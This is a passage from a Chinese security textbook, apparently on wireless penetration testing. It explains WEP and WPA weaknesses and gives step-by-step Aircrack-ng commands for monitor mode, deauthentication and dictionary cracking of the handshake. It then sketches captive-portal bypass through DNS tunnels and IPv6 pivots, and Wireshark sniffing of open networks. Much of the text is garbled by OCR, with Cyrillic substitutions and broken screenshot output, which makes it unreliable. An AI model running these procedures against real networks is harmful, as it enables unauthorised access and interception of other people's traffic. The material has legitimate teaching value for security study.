渗透 测试 中 。 无 线 安 全 中 最 常见 的 Aircrack-ng 工 具 套 件 虽 然 也 有 Windows 版 本 ， 但 是 使 用 并 
不 方便 。Linux 下 的 网 络 人 硬件 会 被 做 一 些 特定 的 标记 ， 比 如 eth0 表 示 第 一 个 以 太 网 卡 〈 面 问 
高 级 用 户 的 程序 通常 使 用 0 来 表示 第 一 个 元 素 ) ，lo 表 示 回 路 (这 是 一 个 特殊 的 网 络 设 备 ， 
表示 回路 ， 在 Linux 下 的 ping 127.0.0.1 就 是 通过 这 个 虚拟 网 络 设 备 实现 的 ) 。 无 线 网 卡通 各 
会 被 标注 为 wlan0， 这 是 正常 模式 。 当 使 用 工具 将 网 卡 载 入 moniter 模 式 时 ， 网 卡 标记 会 变 为 
mon0， 这 是 Linux 下 的 设备 名 ， 所 有 程序 与 便 件 直接 进行 的 交互 操作 都 将 使 用 该 设备 名 作为 
交互 对 象 。 由 于 Linux 较 为 严格 的 权限 管理 ， 程 序 与 硬件 直接 交互 需要 系统 的 最 高 权限 ， 也 
就 是 root 权 限 ， 请 在 root 权 限 下 执行 无 线 渗 透 测 试 套件 (Kali 和 BT 系列 等 专用 的 渗透 测试 系统 
通常 默认 权限 就 是 root) 。 这 里 笔者 推荐 在 Ubuntu 系统 下 搭建 适合 上 自己 的 环境 ， 当 然 读者 还 
可 以 使 用 集成 了 工具 的 BackBox、Kali 等 系统 ， 这 对 于 不 熟悉 Linux 的 新 手 会 很 方便 。 
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5.3.1 概述 


加 密 通 信 最 核心 的 部 分 就 是 算法 ， 这 一 节 主 要 介绍 无 线 安全 中 的 算法 安全 。 不 管 是 
WEP、WPA 还 是 更 多 的 加 密 方 式 ， 都 必须 使 用 加 密 算 法 加 密 ， 一 旦 加 密 算 法 有 漏洞 或 者 
密 钥 被 破解 〈 如 果 是 有 密 钥 的 加 密 算 法 ) ， 一 切 加 密 便 成 了 空谈 。 

目前 整个 互联 网 的 安全 可 以 说 都 是 基于 加 密 算法 的 ， 最 早 的 时 候 只 有 对 等 加 密 算法 
(加 解密 使 用 相同 的 密 钥 ) ， 后 来 出 现 了 不 对 等 加 密 (加 解密 使 用 一 对 密 钥 ， 加 密 用 其 中 
一 个 ， 解 密 只 能 用 男 一 个 ) 以 及 以 MD5 算 法 为 代表 的 不 可 逆 加 密 。 因 为 有 了 不 对 等 加 密 ， 
可 以 在 不 预先 共享 密 钥 的 前 提 下 进行 加 密 通 信 。HTTPS 加 密 的 通信 方式 以 及 OpenSSL 可 以 
说 是 世界 互联 网 安全 的 基石 ， 而 不 可 逆 加 密 算法 〈 摘 要 算法 ) 则 是 网 络 安全 的 重要 保证 。 
MD5 算 法 在 网 站 后 台中 实现 了 在 对 用 户 进行 密码 鉴 权 的 同时 不 保存 用 户 密码 ， 保 证 了 用 户 
信息 的 安全 。 

下 面 将 演示 如 何 进行 无 线 渗透 测试 ， 目 的 是 获取 密 钥 ， 笔 者 将 用 两 个 无 线 网 络 作为 实 
例 ， 一 个 采用 WEP 加 密 ， 一 个 采用 WPA-PSK 加 密 。 

Tips: 如 果 读 者 想 使 用 独立 的 Linux 系 统 来 练习 ， 可 以 尝试 直接 U 盘 启动 BackBox 等 
渗透 测试 系统 ， 如 果 打 算 安 装 独立 的 Linux 系 统 ， 在 分 区 和 安装 系统 的 部 分 一 定 要 非常 小 
心 ，Linux 采 用 了 完全 不 同 的 文件 系统 ， 安 装 的 时 候 若 选择 不 当 很 可 能 会 丢失 数据 。 自 己 
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在 硬盘 上 搭建 渗透 测试 环境 的 话 ， 可 以 直接 安装 Kali/Backbox 或 者 基于 Ubuntu 安装 所 需 的 
工具 。 另 外 虚拟 机 下 的 Linux 不 支持 笔记 本 的 内 置 网 卡 ， 包 括 ExpressCard 网 卡 都 不 支持 ， 
只 能 使 用 USB 网 卡 。 


5.3.2 МЕР 


WEP 协 议 使 用 RC4 加 密 ，RC4 本 来 是 一 种 私有 加 密 算 法 ， 但 是 后 来 被 人 公开 了 ， 运 用 
就 变 得 广泛 起 来 ， 但 是 其 实 很 不 安全 。WEP 的 易 破 解 性 和 ShadowSocks 中 使 用 RC4 加 密 的 
不 安全 性 都 证 明了 这 一 点 。RC4 是 流 加 密 算 法 的 一 种 ， 同 一 个 子 密 钥 绝 不 能 使 用 两 次 ， 
所 以 使 用 (虽然 是 用 明文 传送 的 ) ТУ 的 目的 束 是 要 避免 重复 ; 但 是 24bit (3 个 Byte) 的 
ГУ 实在 太 短 了 ， 在 稍微 老 忙 的 网 络 上 都 极 易 产生 重复 ， 而 且 IV 的 使 用 方式 也 使 其 可 能 i 
受到 关联 式 钥 匙 攻击 。 有 具体 笔者 不 做 细节 分 析 ，RC4 算 法 主要 是 对 数据 进行 了 打 乱 〈 重 
排 ) ， 使 得 数据 混 消 ， 而 没有 加 干扰 ， 这 使 得 RC4 被 普遍 认为 是 一 种 不 安全 的 算法 ， 因 为 
在 数据 中 没有 密 钥 长 度 。 在 WEP 的 破解 过 程 中 只 要 截获 足够 多 的 数据 包 就 可 以 得 到 密 铀 ， 
而 使 用 密 钥 则 可 以 监听 并 解密 所 有 的 数据 包 。 

(1) 打开 终端 。 

(2) 输入 sudo-i1， 然 后 根据 提示 输入 Linux 管 理 员 账户 、 密 码 ， 按 回 车 键 〈( 输 入 密码 
的 时 候 屏 医 上 不 会 显示 密码 或 星 号 ， 但 不 代表 你 密码 没 输 进 去 ) ， 下 一 行 命令 开头 的 $ 变 
为 # 则 代表 成 功 ( 提 示人 符 已 是 # 的 忽略 此 步骤 ) 。 

(3) 输入 apt-get update 更 新 软件 源 。 

(4) 输入 apt-get install aircrack-ng (渗透 测试 系统 忽略 此 步骤 ) 。 

(5) 先 测试 无 线 网 卡 能 不 能 用 ， 使 用 命令 iwconfig， 如 果 出 现 了 某 一 个 网 卡 后 面 有 比 
较 详 细 的 信息 就 请 记 住 它 左边 的 字符 ， 这 里 是 wlan0〈( 见 图 5-1)。 


root@bronco-U31SG: /home/bronco 


root@bronco-U31SG: /home /Бгопсой 
root@bronco-U31SG: /home /bronco# 
root@bronco-U31SG: /home /bronco# 
root@bronco-U31SG: /home /bronco# 
root@bronco-U31SG: /home /Бгопсой 
root@bronco-U31SG: /home /Бгопсой 
root@bronco-U31SG: /home/bronco# iwconfig 
no wireless extensions. 


no міге1е55 extensions. 
no wireless extensions. 


IEEE 802.1169п ESSID: Cl163 

Mode:Managed Егедуепсу:2.462 GHz Access Point: D 

Вії Rate=45 Mb/s Тх-Ромег=15 dBm 

Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 

Power Management:off 

Link Quality=46/70 Signal level=-64 dBm 

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 

Tx excessive retries:105 Invalid misc:27317 Missed beacon:0 


root@bronco-U31SG: /home /bronco# А 
5-1 iwconfig 命 令 返 回信 息 
(6) 将 网 卡 设 定 为 监控 模式 ， 输 入 airmon-ng start wlan0 (将 wlan0 耕 换 为 你 使 用 
iwconfig 查 到 的 字段 ，， 如 图 5-2 所 示 。 


a 


„858 хнзениилиинивяе / у / 


root@bronco-U31SG:/home/bronco# а1гтоп-пд start м1апб 


Found 5 processes that could cause trouble. 
If airodump-ng, аігер1ау-пд ог airtun-ng stops working after 
a short period of time, you may want to К111 (some of) them! 


Name 
ауаһі-даетоп 
ауаһі-даетоп 
NetworkManager 
wpa_supplicant 
dhclient 
Process with РТО 1018 (dhclient) is running on interface и|апо 


Interface Chipset Driver 


м1апе Atheros ath9k - [phy0] 
(monitor mode enabled on топб) 


85-2 ”airmon-ng 命 令 正 确 返 回信 息 


(7) 使 用 ifconfig 确认 网 卡 已 进入 监控 模式 ， 在 终端 输入 ifconfig 命 令 ， 


到 mon0 字 样 的 网 络 设备 ， 如 图 5-3 所 示 。 


Link encap: 未 指定 ”硬件 地 址 00-08-СА-9 

UP BROADCAST RUNNING MULTICAST МТИ: 1500 跃 点 数 :1 
接收 数据 包 :6 错误 :6 丢弃 :8 过 载 :6 帧 数 :6 

发 送 数据 包 :6 错误 : о 丢弃 :6 过 载 :6 载波 :6 

ШЕ :о 发 送 队 列 长 度 :1666 

接收 字 节 :1428 (1.4 кв) ”发送 字 节 :6 (0.0 в) 


图 5-3 正确 设置 网 卡 为 监听 模式 后 所 能 看 到 的 信息 


00-00-00-00-00-00- 


将 在 结果 中 看 


(8) 安装 minidwep-g 代 。 常 用 的 渗透 测试 系统 痢 目 市 了 这 个 软件 ， 从 软件 发 布 的 源码 


说 明 来 看 ， 作 者 应 该 是 中 国人 如 图 5-4 所 示 〉。 


х minidwep message 


Wireless Cards Bssid Essid PWR CH Client AP MAC: 54 4А:32 


0:23:С0:46:81:78 ТРАМК 44 в 85 е WEP Essid: TP-LINK_3. 


wlan0 7 一 —— -一 
| м а Р - 9! Нех key 0" | 212> 


wiano intei 5100 00:23:CD:65:4C 5A__ TP-LINK_65 б МЕР Е 


1С808929 ВАПА BMW -72 1 МЕР 0 


ЖҮ 54Е67С304А32 ТРАІНК ЗОО 278 14 МЕР оо РО!) Кеу і5 іп ке етін Еб 
“ еу 


0А:13:236ЕС4 ЗЕ (5 DBVLMIUW 087 ы 1 
Сһаппе! 
| All у 
Encryption 
(WEP v 
Моде sciecied 


| Ажершу-па -3 Starting агсаск-по to find кеу 


( 0. 2 
Ë Мершу-па -2 8:00-->Starting агсгаск-па to find key 
1:13 
1:13 


в Azeptay-ng -4 >Тгупа to find key пом 

Ё; Ажерву-па -5 9-59-46-.>Alreplay-ng -3 successful injecting now 

С) Arepiay-ng -6 9:59 45-->Агерізу-п0 -5 got fragment xor Ме! injecting now 
Aireplay-ng -7 9-58-51-->Aireplay-ng -2 -p 0841 successfulLiniccting now 


injection rate 5а 46-->Starting агерау 


| 500 ы 


85-4 minidwep-gtk 界 面 


(9) 使 用 minidwep-gtk 破解 WEP 密 码 。 由 于 WEP 的 各 种 协议 漏洞 ， 使 得 破解 WEP 的 
密码 变 得 极为 容易 ， 甚 至 有 这 种 全 目 动 工具 产生 。 破 解 方法 很 简单 ， 单 击 Scan 搜 索 WiFi， 
选择 加 密 方 式 为 WEP 的 热点 ， 然 后 单 击 Lanch 按 钮 (应 该 是 Launch， 开 发 者 打 错 字 了 ) ， 


只 要 信 与 够 好 ， 没 几 分 钟 就 能 在 右边 看 到 密码 了 。 


以 上 是 破解 WEP 密 码 的 方法 。 由 于 破解 过 程 极 为 简单 ，WEP 这 样 的 加 密 方 式 在 当前 


的 安全 环境 中 已 基本 失去 了 价值 。 


А 黑客 与 安全 技术 指南 


5.3.3 М/РА(2)/Р5К 


WPA 和 WPA2 是 现在 主流 的 两 种 加 密 方 法 ， 这 两 种 加 密 方法 其 实 都 具有 很 高 的 安全 
性 ， 它 们 本 身 都 是 企业 级 的 安全 加 密 标 准 ， 需 要 使 用 Radius 服 务 器 来 进行 用 户 鉴 权 。 使 
用 Raidus 服 务 器 做 认证 时 AP 会 目 动 开放 一 条 从 客户 端 到 认证 服务 器 的 通道 ， 因 此 认证 
方法 极为 自由 ， 可 以 是 用 户 名 、 密 码 或 者 是 证 书 ， 还 可 以 是 其 他 方法 。 一 旦 用 户 通过 了 
服务 器 的 鉴 权 ， 服 务 器 返回 同意 连接 的 信息 到 AP 上 ， 至 此 客户 端 就 连接 上 了 一 个 WPA/ 
WPA2 认 证 的 AP。 由 于 Radius 服 务 器 部 署 的 不 便捷 性 和 高 成 本 ， 在 个 人 应 用 中 ， 通常 使 
用 WPA-PSK 或 者 WPA2-PSK 作 为 加 密 方法 ，PSK 的 意思 是 pre-shared key， 即 预 共享 密 
钥 。 简 单 地 说 就 是 在 用 户 访问 之 前 将 访问 密码 告诉 用 户 ， 用 户 得 到 密码 之 后 就 使 用 这 个 
密码 来 连接 热点 。 

WPA2 和 WPA 的 区 别 是 算法 ，WPA 和 WEP 一 样 都 使 用 了 RC4 算 法 ， 但 是 WPA 拓 展 
了 IV 的 位 数 ， 使 得 IV 远 远 没 有 WEP 中 那么 容易 重复 ， 想 等 到 两 个 相同 IV 的 包 变 得 异常 
困难 。 同 时 在 RC4 算 法 的 基础 上 为 每 个 包 引 入 了 单独 的 密 钥 (per-packet кеу) ， 
使 截获 正常 的 通信 数据 包 对 密 钥 的 破解 不 再 有 帮助 。 密 钥 通 过 算法 进行 不 可 道 运算 之 
后 的 数据 只 会 在 握手 包 中 出 现 。 所 以 WPA 的 监听 必须 在 监听 到 握手 包 之 后 才能 获得 有 
可 能 解密 的 数据 包 ， 而 真正 解密 需要 等 到 破解 了 密码 。 解 密 WPA 数 据 包 也 是 一 个 麻烦 的 
过 程 ， 因 为 这 种 运算 的 不 可 道 性 ， 必 须 使 用 密码 字典 中 的 密码 逐个 做 同样 的 运算 ， 尝 试 能 
否 得 到 一 样 的 结果 。 这 样 的 运算 量 较 WEP 无 疑 是 巨大 的 ， 而 且 浮 点 运算 对 于 CPU 是 一 件 非 
常 吃力 的 事 〈( 比 特 币 也 是 浮 点 运算 ) ， 所 以 通常 会 使 用 显卡 或 者 专门 的 FPGA 计 算 卡 来 猜 
测 密码 。 

WPA2 人 允许 使 用 AES 算 法 。AES 是 高 级 加 密 标准 ， 是 一 种 加 密 强 度 和 加 解密 速度 都 高 
于 DES 的 算法 。AES128 在 AES 标 准 中 的 加 密 强 度 最 低 ， 但 是 这 样 的 加 密 强 度 对 破解 时 间 
的 要 求 已 经 远 超人 类 历史 了 ， 所 以 是 很 安全 的 东西 (当然 不 能 排除 存在 算法 漏洞 )。 

现在 WEP 热 点 已 经 非常 少见 了 ， 根 据 需 求 ， 一 般 人 要 么 选择 不 加 密 ， 要 么 选择 WPA 
加 密 ， 而 不 会 选择 WEP 这 种 加 密 强 度 低 、 又 不 同 他 人 开放 网 络 的 方法 。 

WPA(2)-PSK 加 密 的 破解 无 疑 是 非常 困难 的 ， 后 来 由 于 快速 连接 CWPS/QSS) 方法 的 
出 现 ， 可 以 使 破解 变 得 更 加 有 效 ， 但 是 不 能 像 传统 方法 一 样 抓 到 包 后 离开 热点 范围 慢 慢 破 
解 ， 而 需要 将 设备 置 于 热点 周边 几 个 小 时 ， 等 待 破解 完毕 。 

本 书 重点 是 信息 安全 而 不 是 讲解 如 何 足 网 ， 笔 者 认为 WPS/QSS 法 在 实际 的 渗透 过 程 
中 没有 什么 价值 ， 毕 竞 没 有 一 个 可 以 让 你 进行 几 小 时 渗透 的 环境 ， 故 这 里 只 讲解 抓 握手 包 
的 方法 。 

下 面 讲解 WPA(2)-PSK 网 络 的 破解 方法 ， 笔 者 直接 从 网 卡 进 入 了 监视 模式 之 后 开始 
写 ， 前 几 步 和 之 前 所 介绍 的 内 容 是 一 样 的 。 

(1) 使 用 airodump-ng mon0 但 看 当前 的 所 有 无 线 网 络 ， 并 获取 详细 信息 〈 见 图 5-5)。 
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root@bronco-U31SG: /home/bronco 


CH -1 ][ ELapsed: 5 mins ][ 2015-02-27 12:08 


б 
als 


Beacons #Data, #/s MB ENC CIPHER AUTH ESSID 
12 
165 
газа 
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54е ИРА? CCMP PSK 
54е. WPA2 ССМР PSK 
54e. WPA2 CCMP PSK 
54e. WPA2 CCMP PSK 
54e. WPA2 CCMP PSK 
54e. WPA2 CCMP PSK 
54e. OPN 
54е. WPA ТКТР PSK 
54е. ОРМ 
54е. ОРМ 
54е. ОРМ 
54е. ОРМ 
54е. ОРМ 
54е. WPA TKIP PSK 
54е. WPA TKIP PSK 
54e WPA CCMP PSK 
54e WPA CCMP PSK 
54e. WPA TKIP PSK 
54e. WPA2 CCMP PSK 
54e. WPA2 CCMP PSK 
54e. OPN 
54e WPA2 CCMP PSK 
54е. WPA2 ССМР PSK 
22e. WPA2 CCMP PSK 
54e. OPN 
54e. WPA2 CCMP PSK 
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5-5 airodump-ng m 
airodump-ng 的 结果 随 看 时 间 的 推进 会 越 来 越 多 ， 上 和 面 一 组 结果 是 AP 的 信息 ， 下 面 的 
是 客户 问 的 信息 ， 当 目标 AP 出 现在 了 上 面 一 组 结果 的 时 候 台 可 以 按 Ctrl+C 组 合 键 收 手 了 。 
这 里 第 2 条 c103 就 是 笔者 的 目标 。 
(2) 记录 一 下 目标 AP 的 BSSID (MAC 地 址 ) 和 频段 〈 此 处 为 6) ， 然 后 执行 
airodump-ng -c 频段 --bssid mac 地 址 -w 保存 抓 到 的 数据 包 的 文件 名 mon0， 如 图 5-6 所 示 。 


гоої@Ьгопсо - 03156: /Поте /Бгопсой airodump-ng -c 6 -w miaomiao --bssid D В:В3:Е7 mong 


В5-6 _ airodump-ng 命 令 示 例 
然后 终端 会 进入 如 图 5-7 所 示 的 界面 。 


CH 6 |І Elapsed: 56 $ ][ 2015-02-27 19:35 ][ fixed channel топе: -1 
BSSID PWR ЕХО Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


00:С7:СО:СВ:ВЗ:Е7 -66 100 331 6556 20 11 54е. WPA2 ССМР PSK с103 


BSSID STATION PWR Rate Lost Packets Probes 


00:С7 B3:E7 00:08: : CD 9 11е- де 9 3193 
00:С7 83:Е7 СС:ҒА: ‚ВВ -41 5е- 5е 46 3950 


В5-7 ”加 筛选 的 airodump-ng 界 面 


_ Ü «МИ 


Е КЕЛИН 7158880, РУКИН СЕ нї A2 L НОЈ Р СЕ, ИП 
Жїн ЖЕЛІ БЕЯ ВСН, SEHR Y @% 130 Z Ja Ён] РА ЗЕ E JN Br rH i РЕ, 
了 。 图 $-7 中 第 二 个 客户 端 是 笔者 的 手机 ， 下 面 笔者 将 使 用 重 放 攻 击 ， 并 捕获 它 和 AP 之 间 
的 联系 。 

(3) 开局 一 个 新 终 疹 《获取 root 权 限 ) ， 进 行 重 放 攻击 ， 输 入 aireplay-ng -0 10 -a 
BSSID -c 客户 端 地 址 〈station 列 ) mon0， 如 图 5-8 所 示 。 


oot@bronco-U31SG:/home/bronco# аігер1ау-пд -0 10 -a DO: -с СС: РА: 
В топе 

19:42:12 Waiting Гог beacon frame (BSSID: D Е7) оп channel -1 

19:42:12 Couldn't determine current channel Гог топе, you should either force t 


e operation with --ignore-negative-one or apply a kernel patch 
Dlease specify an ESSID (-е). 
oot@bronco-U31SG: /home/broncot# В 


图 5-8 许多 计算 机 在 使 用 aireplay-ng 时 会 出 现 的 问题 
此 时 出 现 了 一 个 问题 ， 训 是 没有 做 过 特殊 人 处理 的 内 核 可 能 会 导致 mon0 返 回 频 段 为 -1 
(不 存在 的 频段 ) ， 根 据 提示 可 以 使 用 --ignore-negative-one 忽 略 这 个 问题 。 执 行 成 功 后 会 
出 现 如 图 $-9 所 示 的 画面 ， 这 时 可 以 进行 下 一 步 ， 合 则 可 能 是 信号 原因 ， 请 多 重 试 几 次 。 


oot@bronco-U31SG:/home/bronco# aireplay-ng -0 10 -a D0:C7:C0:CB:B3:E7 -c СС:ҒА: 
:BB --1дпоге-педабіуе-опе топе 

Waiting for beacon frame (BSSID: DO:C7:CO:CB:B3:E7) on channel -1 
Sending directed DeAuth. $ТМАС: - :BB] ACKS ] 
Sending 64 directed DeAuth. STMAC: -:BB] ACKS ] 
Sending 64 directed DeAuth. STMAC: -:ВВ] АСК$ ] 
Sending 64 directed DeAuth 5ТМАС: -:ВВ] АСК$ ] 
Sending 64 directed DeAuth. STMAC : -:BB] ACKS ] 
Sending 64 directed DeAuth. STMAC : -:ВВ] АСК$ ] 
Sending 64 directed DeAuth 。 $ТМАС: -:BB] j АСК$ | 
Sending 64 directed DeAuth 5ТМАС: -:ВВ] АСК$ ] 
Sending 64 directed DeAuth 。 STMAC : -:ВВ] АСК$ ] 
Sending 64 directed DeAuth 。 STMAC : -:ВВ] АСК$ | 

oot@bronco-U315G: /Поте /Бгопсой { 


图 5-9 aireplay-ng 攻 击 成 功 返 回信 息 
(4) 在 alrodump 的 终端 里 按 Ctrlt+C 组 合 键 结束 进程 ， 然 后 用 aircrack-ng 跑 密码 。 常 用 
命令 aircrack-ng -w 字典 文件 -b bssid 地 址 cap 文 件 名 ， 如 图 5-10 所 示 。 


root@bronco-U31SG: /home/bronco# aircrack-ng -w doufugan.txt -b 00:С7: 
miaomiao-01.cap 


图 5-10 ”aircrack-ng 命 令 示例 
按 回 车 键 进入 跑 包 “界面 ， 如 图 5-11 所 示 。 
Aircrack-ng 1.1 
[00:00:00] 4 keys tested (339.76 k/s) 
KEY FOUND! [ (Ө) ] 


Master Key ЕЕ F9 69 34 80 F3 31 
А9 59 С1 36 А5 54 21 


Transient Key : ВЕ 1Е BF BO С5 00 47 Аб 37 01 DB 38 26 69 5А 
таа В 
20 3 6 
06 9 D 05 


EAPOL НМАС 5 FA SC BE GB 'F7 ID 8F 94 90 DC 


图 5-11 aircrack-ng 爆 破 密 码 成 功 返 回信 息 
О 跑 包 ， 指 用 字典 与 握手 包 进 行 核对 。 
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此 处 笔者 为 节省 时 间 直 接 把 正确 密码 放 入 字典 了 ， 上 所 以 瞬间 就 跑 出 了 结果 。 
以 上 就 是 破解 WPA(2)-PSK 加 密 的 全 过 程 。 


5.4 通信 安全 


5.4.1 概述 


无 线 通 信 作 为 一 种 通信 方式 ， 最 核心 的 部 分 日 然 是 信息 本 喘 。 本 节 看 重头 注 信息 在 无 
线 网 络 传递 过 程 中 的 安全 问题 ， 将 使 读者 对 无 线 网 络 环境 中 传输 信息 的 安全 性 以 及 针对 信 
恩 内 容 的 攻防 手段 有 所 了 解 。 


54.2 加密 网 络 渗透 


通常 情况 下 ， 大 多 数 人 破解 无 线 网 络 可 能 只 是 为 了 “ 足 网 ”， 也 就 是 获得 访问 权限 ， 
但 是 黑客 破解 热 上 的 男 一 重 意 义 是 为 目 己 在 一 个 安全 的 网 络 环 境 中 打开 一 个 突破 口 。 破 解 
无 线 热点 可 以 快速 侵入 防火 墙 内 部 (相对 于 从 外 部 穿 透 NAT) ， 从 而 进入 内 网 渗透 阶段 。 
这 样 的 情景 通常 会 出 现在 社工 渗透 或 者 APT 中 ， 同 时 目的 也 不 仅 是 可 以 上 网 那么 人 简单， 而 
是 销 取 信息 。 此 时 人 们 保卫 的 不 仅仅 是 带宽 和 网 络 资源 ， 更 是 网 络 的 信息 安全 。 


5.4.3 通信 监听 


很 多 企业 会 采用 另外 一 种 无 线 内 网 的 部 署 方式 ， 即 透 传 无 线 网 + 登录 界面 。 比 较 典 型 
的 解决 方案 是 H3C 提 供 的 IMC Portal。 笔 者 工作 的 地 方 也 采用 了 这 套 方 案 来 实现 局 域 网 的 
管理 。 当 用 户 连接 上 该 网 络 后 ， 将 不 能 获得 Internet 及 其 他 同 局 域 网 计算 机 的 访问 权限 ， 
ping 都 ping 不 通 。 帮 黑客 在 社工 渗透 的 过 程 中 使 用 一 台 有 线 网 机 器 〈 通 营 无 须 鉴 权 ) 或 已 
完成 登录 的 无 线 网 机 器 搭 跳板 ， 使 用 Iodine 等 DNS 穿 透 工具 ， 就 可 以 使 用 DNS 通道 穿 透 内 
网 ， 从 而 进入 内 网 渗透 阶段 。DNS 通 道 是 比较 复杂 的 方案 ， 这 里 不 做 过 多 叙述 ， 想 研究 
DNS 通道 技术 的 读者 可 以 目 己 查找 资料 。 另 外 很 可 能 遇 到 的 一 种 情况 是 IPv6 无 屏蔽 ， 而 IPv4 
的 数据 包 却 基本 无 法 穿 透 。 这 时 ， 攻 击 者 会 将 安装 了 目 己 固件 的 开发 板 接 入 有 线 〈 开 发 板 
ЖА Л, БЕВ) ， 搭 建 IPv6 转 IPv4 代 理 服务 器 ， 从 而 实现 未 鉴 权 计算 机 通过 IPV6 穿 
透 到 开发 板 做 的 内 网 跳板 ， 同 时 接 入 内 网 ， 进 入 内 网 渗透 阶段 。 攻 击 者 一 般 先 用 Intel Galileo 
Gen2 作 为 跳板 ， 其 次 是 Beagle Bone 和 树 春 派 。IPv6 代 理 服 务 器 比较 难 配 置 ， 但 是 已 经 有 
成 熟 的 方案 存在 了 。 

攻击 者 对 于 没有 加 密 的 无 线 网 络 ， 一 般 从 无 线 本 喘 入 手 进行 攻击 。 由 于 其 目的 是 穷 取 
数据 ， 可 以 在 不 连接 或 者 无 鉴 权 的 情况 下 实现 ， 甚 全 做 到 获得 鉴 权 所 用 的 账户 〈 由 于 登录 界面 
通常 没有 加 密 ， 合 法 用 户 登 录 时 的 信息 是 明文 传输 的 ) ， 从 而 获得 进入 内 网 的 合法 身份 。 
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黑客 与 安全 技术 指南 


模式 ， 然 后 使 用 Wireshark 进 行 抓 包 即 可 。 

有 几 个 要 点 需要 提示 一 下 : Wireshark 需 要 使 用 root 权 限 局 动 ， 人 否则 无 法 抓 取 监听 模式 
网 卡 的 通信 ， 请 确保 网 卡 被 锁定 在 了 被 监听 的 目标 热点 的 频段 上 ， 如 果 做 不 到 可 以 让 网 卡 
在 连接 目标 热点 的 同时 进行 监听 《可 能 会 打 草 恢 蛇 ) ， 如 果 凰 对 方 发 现 则 可 以 连接 到 相 
同 频段 的 WiFi1， 例 如 是 自己 的 手机 热点 (多 试 几 次 总 会 连 到 相同 频段 的 ) ， 然 后 进行 监 
听 。 这 种 方法 可 以 用 在 不 能 杀 挤 引起 网 卡 调 频 的 进程 时 候 锁定 网 卡 的 频段 。Wireshark 默 认 
只 能 抓 取 一 些 无 法 识别 具体 应 用 层 协 议 的 数据 包 ， 者 要 识别 应 用 层 数 据 包 《例如 在 HITP 
传输 中 具体 包含 的 内 容 ) 则 需要 打开 设置 中 的 一 个 开关 ， 如 图 5-12 所 示 ， 需 要 打开 Enable 
decryption 开 关 。 
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Profile: Default 


Reassernble fragmented 802,11 datagrams: 


ignore vendor-specifc HT elements: 


Call subdissoctor for retransmitted 802.11 frames: 


Assume packets have FCS 
Ignore the Protection bit 


Епаше deoypton 


Key examples: 01:02:03:04:05 (40/64-bit WEP), 


攻击 者 依然 可 以 使 用 之 前 的 方法 将 网 卡 进 入 监听 


О м 


Yes - without IV Yes -with [V 


pO Ze 
P/1.1 GET /4 


010203040506070809101111213 (104/1 28-0 WEP). 
МуРаззмога СМуАР] (WPA + plaintext password [+ 55110), 
0102030405...6061626364 [WPA + 256-bit key}. Invalid keys will Бе ignored. 


бестурлюл Keys 


Ражкете 9807 - Displayed: Bs (0.9%] - Droppet 1 (0.0%) 


Edit... 


index_ipho 


WACO 


Profile: Default 


图 5-12 ”Wireshark 打 开 加 密 支 持 开 关 
之 后 Wireshark 会 要 求 重 局 一 次 监听 ， 按 要 求 重 新 进行 监听 之 后 就 可 以 读 取 应 用 层 数据 
包 了 。 例 如 在 Filter 栏 输入 http 并 单 击 旁 边 的 Apply 便 可 以 只 查看 可 以 轻易 理解 的 HITP 数 据 


包 ， 而 不 显示 其 他 数据 包 ， 具 体 效果 如 图 5-13 所 示 。 


*mon0 


ee 


ERECT TA 


Wi (4 


(уйі 


reshark 1.10.6 


Fiter | http 


No 


Time Source 
8852 99.620043000 192.168.43.210 
8856 99.640901000 192.168.43.210 


8859 09.660489000 192.168.43.210 


8863 99.676501000 115,239,210,14 
8868 99.692313000 115.239,210.14 


#920 99.823785000 192.168.43.210 
8322 99.825576000 115.239.210.14 
9004 100.07339500 115.239.210.14 
9121 100,28597100 115,239,210,14 
9125 100.28598500 115,239,210,14 
9304 100.67805900 115.239.210.14 
9306 100.69654300 115.239.210.14 
9308 100.68655406 115.239.210.14 
9552 101.07787900 113.239.210.14 
9554 101.07991000 115,239,210,14 
9557 101.08373700 115.239.210.14 
9680 101.25731500 221.228.17.152 
9730 101.56922900 192.168.43.210 
9769 101.70387400 192.168.43.210 
9798 101.75557400 192.168.43.210 


Ж тыр” ымы зы ww 


IEEE 802.11 905 Data, Flags: ......F.C 


0000 0000 12 00 2f 48 0000 24 96 73 2200000000 ..._ИН.. $-5”.... 


Type/Subtype: QoS Data (0х28) 


(71.10.6 гот тазтег-1.10)] 


x Ç Q < 


Destination 

115.239.210.14 
115.239.210.14 
115.239 210.14 


19г.168.43.210 
192.168.43.210 


221.228 17.152 
192.168 43.210 
192.168.43.210 
192.168.43,210 
192.168.43.210 
192.168.43.210 
192.168.43.210 
192.168 43.210 
192.168.43.210 
192.168.43.210 
192.168.43.210 
192.168.43.210 
221.228.17.152 
221.228 17.152 
221.228.17.152 


0010 10 бс 85 09 с0 00 е0 01 0000 88 02 2с 00 5860 .1...... ....,.Х. 


Я 


ө 


ame (1088 bytes) 


Reassembled ТСР {25985 bytes) 


File: "tmp'iwireshark_pcapng_mon0 


ы 


Expression 


Protocp 


HTTP 
HTTP 
HTTP 


ът; Ен 


Char App ча 

Length Info 

707 GET /stati mews/webapp/modubes/gmu 2283505 HTTP/1.1 
708 СЕТ /static/news/webappimodules/rnain_c64ff7a.js HTTP/1.1 
707 GET !static/nows/wobappimopdulos/ib_1e85b55.jç HTTP/1.1 


B75 Continuation or non-HTTP traffk 
1464 Continuation or non-HTTP traffk 


550 GET /toolbar//show. do?mxi=0. 7296242050360888 НТТР/1.1 
215 Continuation or non-HTTP traffic 
1464 Continuation ог non-HTTP traffk 
1464 Continuation ог поп-НТТР traffk 
314 Continuation or non-HTTP traffk 
1454 Continuation or non-HTTP traffk 
1464 Continuation or mon-HTTP гаї 
314 Continustion or non-HTTP traffic 
164 НТТРЛ.1 200 ОК (apphcation/x-Javascript) 
1464 Continuation or non-HTTP traffic 
748 Continuation or non-HTTP traffk 
1088 НТТР/1.1 200 OK (texvjavascript) 
436 СЕТ /toolbar/images/traffikalerutogo_4g.png HTTP/1.1 
435 СЕТ /taolbarfimages/trafficalert/q_2000 png НТТР/1.1 
440 GET /toolbarimages/traffkalort/btn-fowadd.png HTTP/1.1 


Uncompressed ватку body (155320 bytes] 


Packets: 9907 - Displayed: 84 (0.9%) - Dropped: 1 {0.0%} 


5-13 ”Wireshark 的 http 筛 选 器 效果 
